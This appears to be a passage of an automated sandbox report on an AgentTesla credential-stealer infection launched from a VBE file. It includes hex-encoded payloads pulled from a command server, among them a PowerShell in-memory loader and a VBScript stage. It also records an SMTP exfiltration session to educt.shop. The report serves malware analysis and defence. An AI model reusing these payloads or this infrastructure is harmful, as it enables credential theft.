                                                                Oct 22, 2024 14:46:27.823873997 CEST1.1.1.1192.168.2.50x5953No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                Oct 22, 2024 14:46:27.823873997 CEST1.1.1.1192.168.2.50x5953No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • api.ipify.org
                                                                • 144.91.79.54

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.549705144.91.79.54806200C:\Windows\System32\wscript.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 22, 2024 14:46:03.732659101 CEST152OUTGET /1210/s HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                Host: 144.91.79.54
                                                                Oct 22, 2024 14:46:04.588548899 CEST1236INHTTP/1.1 200 OK
                                                                Date: Tue, 22 Oct 2024 12:46:04 GMT
                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                Last-Modified: Wed, 02 Oct 2024 01:26:13 GMT
                                                                ETag: "6ab0-6237452d358f3"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 27312
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Data Raw: 33 44 33 44 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 [TRUNCATED]
                                                                Data Ascii: 3D3D414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414
                                                                Oct 22, 2024 14:46:04.588563919 CEST1236INData Raw: 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34
                                                                Data Ascii: 141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141
                                                                Oct 22, 2024 14:46:04.588589907 CEST424INData Raw: 44 33 39 33 32 36 33 37 36 34 41 33 33 35 39 37 30 33 31 35 37 34 43 37 41 34 36 35 37 36 32 36 43 36 38 33 32 35 39 37 41 37 30 36 41 36 32 37 39 35 36 36 45 34 39 33 39 34 44 36 45 36 32 37 33 33 31 34 37 36 35 36 37 33 38 36 44 35 41 37 35 36
                                                                Data Ascii: D393263764A33597031574C7A4657626C6832597A706A6279566E49394D6E627331476567386D5A756C45647A566E6330784449676F51442B3869497742585975343262705258596A6C47627742585135316B49395557626835474969416A4C7734434D75456A4939343262704E6E636C5A4849355258613035
                                                                Oct 22, 2024 14:46:04.588601112 CEST1236INData Raw: 41 37 30 36 41 36 32 37 39 35 36 36 45 34 39 33 39 34 44 36 45 36 32 37 33 33 31 34 37 36 35 36 37 36 42 34 38 36 32 36 39 33 31 35 37 35 41 37 41 34 45 35 38 35 39 33 38 36 46 35 31 34 34 34 42 33 30 36 37 35 30 32 46 34 39 37 39 36 33 36 43 36
                                                                Data Ascii: A706A6279566E49394D6E6273314765676B48626931575A7A4E5859386F51444B3067502F4979636C6C6E4939556D62767857596B355759304E48496967544C4752565669307A5A756C475A764E6D626C4269497734534D69306A62766C326379566D6467775762343944502F75373741414141414141414141
                                                                Oct 22, 2024 14:46:04.588610888 CEST1236INData Raw: 37 34 31 33 34 34 32 35 31 35 41 34 31 33 34 34 33 34 31 33 30 34 31 36 37 34 44 34 31 34 31 34 34 34 31 37 39 34 31 34 31 34 44 34 31 34 35 34 34 34 31 37 39 34 31 34 31 34 44 34 31 35 31 34 37 34 31 37 33 34 32 35 31 36 31 34 31 35 35 34 38 34
                                                                Data Ascii: 7413442515A413443413041674D414144417941414D414544417941414D4151474173425161415548414342414141554741744251594134454173425159413447417942515A41514841754251534145414153414152414141417741674C414144417541414D41344341784141414141414175427762416B4741
                                                                Oct 22, 2024 14:46:04.588620901 CEST424INData Raw: 38 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 37 37 34 31 33 38 34 31 34 31 34 31 34 31 34 32 34 41 34 31 34 31 34 44 34 31 37 41 34 31 34 31 34 31 34 31 34 31 34 31 35 31 34 31 34 31 34 31 34 31 34 31 34 31 34
                                                                Data Ascii: 84141414141414141414141414177413841414141424A41414D417A41414141414151414141414141414141414141414141414141414167414141614141414142415141414141414141414141414141414141414141414141414167414141414141514141414141414141414141414141414141414141674141
                                                                Oct 22, 2024 14:46:04.589106083 CEST1236INData Raw: 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34
                                                                Data Ascii: 1414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414145494155792F41414141414141417378475A7555575A793932597A314741756C
                                                                Oct 22, 2024 14:46:04.589116096 CEST1236INData Raw: 43 34 43 37 41 35 36 33 32 35 39 37 39 35 36 33 33 36 32 37 41 35 36 36 44 35 35 37 35 33 30 35 37 35 41 33 30 34 45 35 38 36 35 35 34 37 38 34 37 34 31 34 31 34 31 35 31 36 42 34 31 34 31 34 31 34 31 34 32 33 34 33 37 33 37 34 42 33 37 34 44 34
                                                                Data Ascii: C4C7A563259795633627A566D557530575A304E5865547847414141516B41414141423437374B374D4141414174414177636E3557613052585A543553654E74414142414241414D585A6A6C6D647956325569563256756B58544F4151415441414179563263563553654E644141427741414134326270525859
                                                                Oct 22, 2024 14:46:04.589122057 CEST1236INData Raw: 37 35 32 36 38 34 34 35 35 34 32 35 31 34 31 37 39 33 34 37 39 34 45 37 35 35 31 36 41 36 34 33 39 33 34 33 32 36 32 37 30 34 45 36 45 36 33 36 43 35 41 34 36 34 43 37 32 34 41 33 33 36 32 33 33 35 36 35 37 36 32 36 38 34 41 36 45 35 32 35 35 35
                                                                Data Ascii: 7526844554251417934794E75516A6439343262704E6E636C5A464C724A336233565762684A6E5255566B54757742414230454141416A4C7734434D75457A42414541444141774E7A516A5A326754593449544F6C6C544C30677A4D69316959336B444E744D6D4E7863544C32517A4D6D5A7A4E3167444A4145
                                                                Oct 22, 2024 14:46:04.589391947 CEST1236INData Raw: 46 34 35 34 32 34 31 36 39 34 32 34 46 36 42 36 44 34 35 34 32 34 31 35 33 34 32 34 36 33 30 35 32 36 44 34 31 34 42 35 32 34 31 36 37 36 33 35 31 37 38 34 31 34 42 34 32 34 31 34 31 35 35 36 37 34 34 34 46 34 35 34 31 34 31 34 35 37 37 36 38 34
                                                                Data Ascii: F45424169424F6B6D45424153424630526D414B524167635178414B4241415567444F4541414577684442414142494551414151516A414B52426449774248454141414D67444245414145344141674D516A414B5241424167424F775241675167414F6B496753494149483467444F494141466B496753594142
                                                                Oct 22, 2024 14:46:04.594352007 CEST1236INData Raw: 31 36 37 34 38 34 31 36 43 34 32 37 37 34 41 34 31 33 34 34 37 34 31 36 37 34 31 35 31 35 41 34 31 36 42 34 46 34 31 37 30 34 32 36 37 35 41 34 31 36 42 34 37 34 31 36 41 34 32 35 31 33 36 34 31 34 31 34 38 34 31 37 41 34 32 34 31 34 39 34 31 35
                                                                Data Ascii: 16748416C42774A413447416741515A416B4F417042675A416B47416A425136414148417A4241494155474179424164414D48417042775A4155474179424149415547416B424149416B4F41734277594141434168424154564241416342515A4149484168427764415148416D427762414D3145414177634155
                                                                Oct 22, 2024 14:46:04.765830994 CEST152OUTGET /1210/r HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                Host: 144.91.79.54
                                                                Oct 22, 2024 14:46:05.021224976 CEST1236INHTTP/1.1 200 OK
                                                                Date: Tue, 22 Oct 2024 12:46:04 GMT
                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                Last-Modified: Wed, 09 Oct 2024 05:50:42 GMT
                                                                ETag: "9800-62404d5968a93"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 38912
                                                                Keep-Alive: timeout=5, max=99
                                                                Connection: Keep-Alive
                                                                Data Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 [TRUNCATED]
                                                                Data Ascii: 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                                                Oct 22, 2024 14:46:05.246551037 CEST175OUTGET /1210/thEh4UQ3nf0RsZGPSynf.txt HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                Host: 144.91.79.54
                                                                Oct 22, 2024 14:46:05.502326012 CEST1236INHTTP/1.1 200 OK
                                                                Date: Tue, 22 Oct 2024 12:46:05 GMT
                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                Last-Modified: Tue, 22 Oct 2024 06:53:19 GMT
                                                                ETag: "75400-6250b3976cad7"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 480256
                                                                Keep-Alive: timeout=5, max=98
                                                                Connection: Keep-Alive
                                                                Content-Type: text/plain
                                                                Data Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 [TRUNCATED]
                                                                Data Ascii: 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                                                Oct 22, 2024 14:46:06.189971924 CEST152OUTGET /1210/v HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                Host: 144.91.79.54
                                                                Oct 22, 2024 14:46:06.531855106 CEST761INHTTP/1.1 200 OK
                                                                Date: Tue, 22 Oct 2024 12:46:06 GMT
                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                Last-Modified: Wed, 25 Sep 2024 15:44:42 GMT
                                                                ETag: "1de-622f3802a248c"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 478
                                                                Keep-Alive: timeout=5, max=97
                                                                Connection: Keep-Alive
                                                                Data Raw: 37 42 35 42 37 44 34 31 37 30 37 30 34 34 36 46 36 44 36 31 36 39 36 45 37 42 35 44 37 44 33 41 33 41 34 33 37 35 37 32 37 32 36 35 36 45 37 34 34 34 36 46 36 44 36 31 36 39 36 45 32 45 34 43 36 46 36 31 36 34 37 42 32 38 37 44 35 42 34 33 36 46 36 45 37 36 36 35 37 32 37 34 37 42 35 44 37 44 33 41 33 41 34 36 37 32 36 46 36 44 34 32 36 31 37 33 36 35 33 36 33 34 35 33 37 34 37 32 36 39 36 45 36 37 37 42 32 38 37 44 37 42 32 38 37 44 32 44 36 41 36 46 36 39 36 45 32 30 37 42 32 38 37 44 34 37 36 35 37 34 32 44 34 39 37 34 36 35 36 44 35 30 37 32 36 46 37 30 36 35 37 32 37 34 37 39 32 30 32 44 34 43 36 39 37 34 36 35 37 32 36 31 36 43 35 30 36 31 37 34 36 38 32 30 32 37 34 38 34 42 34 33 35 35 33 41 35 43 35 33 36 46 36 36 37 34 37 37 36 31 37 32 36 35 35 43 37 43 37 30 36 31 37 34 36 38 37 43 32 37 32 30 32 44 34 45 36 31 36 44 36 35 32 30 32 37 37 33 32 37 37 42 32 39 37 44 32 45 37 33 32 30 37 43 32 30 34 36 36 46 37 32 34 35 36 31 36 33 36 38 32 44 34 46 36 32 36 41 36 35 36 33 37 34 32 30 37 42 [TRUNCATED]
                                                                Data Ascii: 7B5B7D417070446F6D61696E7B5D7D3A3A43757272656E74446F6D61696E2E4C6F61647B287D5B436F6E766572747B5D7D3A3A46726F6D426173653634537472696E677B287D7B287D2D6A6F696E207B287D4765742D4974656D50726F7065727479202D4C69746572616C506174682027484B43553A5C536F6674776172655C7C706174687C27202D4E616D65202773277B297D2E73207C20466F72456163682D4F626A656374207B7B7D245F7B5B7D2D312E2E2D7B287D245F2E4C656E6774687B297D7B5D7D7B7D7D7B297D7B297D7B297D3B207B5B7D622E627B5D7D3A3A627B287D277C706174687C277B297D
                                                                Oct 22, 2024 14:46:06.621951103 CEST155OUTGET /1210/file HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                Host: 144.91.79.54
                                                                Oct 22, 2024 14:46:06.877648115 CEST1236INHTTP/1.1 200 OK
                                                                Date: Tue, 22 Oct 2024 12:46:06 GMT
                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                Last-Modified: Wed, 02 Oct 2024 01:14:12 GMT
                                                                ETag: "15aa-6237427da239f"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 5546
                                                                Keep-Alive: timeout=5, max=96
                                                                Connection: Keep-Alive
                                                                Data Raw: 34 46 37 30 37 34 36 39 36 46 36 45 32 30 34 35 37 38 37 30 36 43 36 39 36 33 36 39 37 34 30 41 30 41 32 37 32 30 34 45 36 46 36 44 32 30 36 34 37 35 32 30 37 30 37 32 36 46 36 41 36 35 37 34 33 41 32 30 37 43 37 30 36 31 37 34 36 38 37 43 30 41 32 37 32 30 35 36 36 31 37 32 36 39 36 31 36 32 36 43 36 35 37 33 32 30 36 37 36 43 36 46 36 32 36 31 36 43 36 35 37 33 30 41 34 34 36 39 36 44 32 30 37 33 36 38 36 35 36 43 36 43 35 33 37 39 37 33 37 34 36 35 36 44 36 35 32 43 32 30 36 33 36 38 36 35 36 44 36 39 36 45 35 37 36 39 36 45 36 34 36 46 37 37 37 33 32 43 32 30 36 33 36 46 36 44 37 30 37 34 36 35 37 35 37 32 34 32 36 46 37 35 36 33 36 43 36 35 37 33 30 41 35 33 36 35 37 34 32 30 37 33 36 38 36 35 36 43 36 43 35 33 37 39 37 33 37 34 36 35 36 44 36 35 32 30 33 44 32 30 34 33 37 32 36 35 36 31 37 34 36 35 34 46 36 32 36 41 36 35 36 33 37 34 32 38 32 32 35 37 35 33 36 33 37 32 36 39 37 30 37 34 32 45 35 33 36 38 36 35 36 43 36 43 32 32 32 39 30 41 36 33 36 38 36 35 36 44 36 39 36 45 35 37 36 39 36 45 [TRUNCATED]
                                                                Data Ascii: 4F7074696F6E204578706C696369740A0A27204E6F6D2064752070726F6A65743A207C706174687C0A27205661726961626C657320676C6F62616C65730A44696D207368656C6C53797374656D652C206368656D696E57696E646F77732C20636F6D7074657572426F75636C65730A536574207368656C6C53797374656D65203D204372656174654F626A6563742822575363726970742E5368656C6C22290A6368656D696E57696E646F7773203D207368656C6C53797374656D652E457870616E64456E7669726F6E6D656E74537472696E677328222577696E6469722522290A0A2720496E697469616C69736174696F6E2064657320706172616DE8747265732064752070726F6772616D6D650A53756220496E697469616C6973657250726F6772616D6D6528290A20202020636F6D7074657572426F75636C6573203D20300A456E64205375620A0A2720466F6E6374696F6E20706F75722076E972696669657220736920756E2070726F636573737573207370E9636966697175652065737420656E20636F7572732064276578E9637574696F6E0A46756E6374696F6E2050726F6365737375734573744163746966286E6F6D447550726F636573737573290A2020202044696D2073657276696365574D492C206C69737


                                                                HTTPS Proxied Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.549751104.26.13.2054436176C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-22 12:46:28 UTC155OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                Host: api.ipify.org
                                                                Connection: Keep-Alive
                                                                2024-10-22 12:46:28 UTC211INHTTP/1.1 200 OK
                                                                Date: Tue, 22 Oct 2024 12:46:28 GMT
                                                                Content-Type: text/plain
                                                                Content-Length: 14
                                                                Connection: close
                                                                Vary: Origin
                                                                CF-Cache-Status: DYNAMIC
                                                                Server: cloudflare
                                                                CF-RAY: 8d699725691b46cb-DFW
                                                                2024-10-22 12:46:28 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36
                                                                Data Ascii: 173.254.250.76


                                                                SMTP Packets

                                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                                Oct 22, 2024 14:46:30.533571005 CEST58749764162.254.34.31192.168.2.5220 server1.educt.shop127.0.0.1 ESMTP Postfix
                                                                Oct 22, 2024 14:46:30.536145926 CEST49764587192.168.2.5162.254.34.31EHLO 473627
                                                                Oct 22, 2024 14:46:30.698116064 CEST58749764162.254.34.31192.168.2.5250-server1.educt.shop127.0.0.1
                                                                250-PIPELINING
                                                                250-SIZE 204800000
                                                                250-ETRN
                                                                250-STARTTLS
                                                                250-AUTH PLAIN LOGIN
                                                                250-AUTH=PLAIN LOGIN
                                                                250-ENHANCEDSTATUSCODES
                                                                250-8BITMIME
                                                                250-DSN
                                                                250 CHUNKING
                                                                Oct 22, 2024 14:46:30.704118013 CEST49764587192.168.2.5162.254.34.31AUTH login c2VuZHhhbWJyb0BlZHVjdC5zaG9w
                                                                Oct 22, 2024 14:46:30.866111040 CEST58749764162.254.34.31192.168.2.5334 UGFzc3dvcmQ6
                                                                Oct 22, 2024 14:46:31.045274973 CEST58749764162.254.34.31192.168.2.5235 2.7.0 Authentication successful
                                                                Oct 22, 2024 14:46:31.045531034 CEST49764587192.168.2.5162.254.34.31MAIL FROM:<sendxambro@educt.shop>
                                                                Oct 22, 2024 14:46:31.209078074 CEST58749764162.254.34.31192.168.2.5250 2.1.0 Ok
                                                                Oct 22, 2024 14:46:31.210385084 CEST49764587192.168.2.5162.254.34.31RCPT TO:<ambro@educt.shop>
                                                                Oct 22, 2024 14:46:31.375787973 CEST58749764162.254.34.31192.168.2.5250 2.1.5 Ok
                                                                Oct 22, 2024 14:46:31.375917912 CEST49764587192.168.2.5162.254.34.31DATA
                                                                Oct 22, 2024 14:46:31.537045002 CEST58749764162.254.34.31192.168.2.5354 End data with <CR><LF>.<CR><LF>
                                                                Oct 22, 2024 14:46:31.537789106 CEST49764587192.168.2.5162.254.34.31.
                                                                Oct 22, 2024 14:46:31.704010010 CEST58749764162.254.34.31192.168.2.5250 2.0.0 Ok: queued as 4907E60E81

                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:08:46:02
                                                                Start date:22/10/2024
                                                                Path:C:\Windows\System32\wscript.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150689.vbe"
                                                                Imagebase:0x7ff644100000
                                                                File size:170'496 bytes
                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:2
                                                                Start time:08:46:06
                                                                Start date:22/10/2024
                                                                Path:C:\Windows\System32\wscript.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\dirDChDJoZeRjid.vbs"
                                                                Imagebase:0x7ff644100000
                                                                File size:170'496 bytes
                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:3
                                                                Start time:08:46:07
                                                                Start date:22/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                                                                Imagebase:0x7ff7be880000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:4
                                                                Start time:08:46:08
                                                                Start date:22/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:6
                                                                Start time:08:46:23
                                                                Start date:22/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                                                                Imagebase:0x7ff7be880000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:7
                                                                Start time:08:46:23
                                                                Start date:22/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:8
                                                                Start time:08:46:26
                                                                Start date:22/10/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                Imagebase:0x2a0000
                                                                File size:45'984 bytes
                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3315071411.0000000002701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3315071411.0000000002701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3312540356.0000000000372000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3312540356.0000000000372000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3315071411.0000000002727000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:10
                                                                Start time:08:46:27
                                                                Start date:22/10/2024
                                                                Path:C:\Windows\System32\wermgr.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "6804" "2876" "2568" "2880" "0" "0" "2884" "0" "0" "0" "0" "0"
                                                                Imagebase:0x7ff6070d0000
                                                                File size:229'728 bytes
                                                                MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
